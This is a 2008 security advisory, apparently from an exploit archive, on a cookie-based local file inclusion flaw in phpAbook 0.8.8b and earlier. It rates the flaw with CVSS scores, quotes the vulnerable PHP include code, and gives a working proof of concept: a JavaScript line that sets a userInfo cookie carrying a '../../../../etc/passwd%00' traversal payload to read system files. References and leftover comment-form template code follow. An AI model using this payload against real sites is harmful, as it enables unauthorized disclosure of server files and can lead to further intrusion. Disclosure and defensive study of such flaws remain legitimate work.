phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability

2008.10.09
Credit: JosS
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# phpAbook <= 0.8.8b (COOKIE) Local File Inclusion Vulnerability # url: http://sourceforge.net/projects/phpabook/ # # Author: JosS # mail: sys-project[at]hotmail[dot]com # site: http://spanish-hackers.com # team: Spanish Hackers Team - [SHT] # # This was written for educational purpose. Use it at your own risk. # Author will be not responsible for any damage. # # *Requirements: magic_quotes_gpc = Off vuln file: include/config.inc.php vuln code: x: >... 61: if (isset($HTTP_COOKIE_VARS["userInfo"]) && $HTTP_COOKIE_VARS["userInfo"] != "") { $userArray = explode(" ", $HTTP_COOKIE_VARS["userInfo"]); $userName = $userArray[0]; $userID = $userArray[1]; $userLang = $userArray[2]; include("include/lang/$userLang/inc.messages.php"); 67: } x: <... Proof of Concept (function 'explode' PHP): [0] = JosS; [1] = JosS; [2] = ../../../../etc/passwd%00; ---> INCLUDE exploit: javascript:document.cookie="userInfo=JosS JosS ../../../../etc/passwd%00; path=/"; Ingenious work :D

References:

http://xforce.iss.net/xforce/xfdb/45680
http://www.securityfocus.com/bid/31581
http://www.milw0rm.com/exploits/6679


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top